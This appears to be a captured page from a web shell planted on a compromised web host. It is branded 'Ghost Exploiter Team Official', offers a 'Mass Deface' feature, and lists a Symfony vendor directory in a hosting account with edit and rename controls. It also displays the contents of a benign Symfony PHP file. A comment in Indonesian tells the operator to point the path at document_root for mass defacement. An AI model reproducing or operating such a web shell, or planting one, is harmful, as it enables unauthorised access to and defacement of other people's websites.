webshell
Ghost Exploiter Team Official
Mass Deface
Directory >>
/
home
/
whitjouh
/
public_html
/
core
/
vendor
/
symfony
/
error-handler
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
+New File
Error
--
ren
ErrorEnhancer
--
ren
ErrorRenderer
--
ren
Exception
--
ren
Internal
--
ren
Resources
--
ren
BufferingLogger.php
2.021KB
edt
ren
CHANGELOG.md
0.914KB
edt
ren
Debug.php
1.051KB
edt
ren
DebugClassLoader.php
48.138KB
edt
ren
ErrorHandler.php
26.473KB
edt
ren
LICENSE
1.043KB
edt
ren
README.md
1.31KB
edt
ren
ThrowableUtils.php
0.845KB
edt
ren
composer.json
1.11KB
edt
ren
<?php /* * This file is part of the Symfony package. * * (c) Fabien Potencier <fabien@symfony.com> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Symfony\Component\ErrorHandler; use Symfony\Component\ErrorHandler\Exception\SilencedErrorContext; /** * @internal */ class ThrowableUtils { public static function getSeverity(SilencedErrorContext|\Throwable $throwable): int { if ($throwable instanceof \ErrorException || $throwable instanceof SilencedErrorContext) { return $throwable->getSeverity(); } if ($throwable instanceof \ParseError) { return \E_PARSE; } if ($throwable instanceof \TypeError) { return \E_RECOVERABLE_ERROR; } return \E_ERROR; } }
<=Back
Liking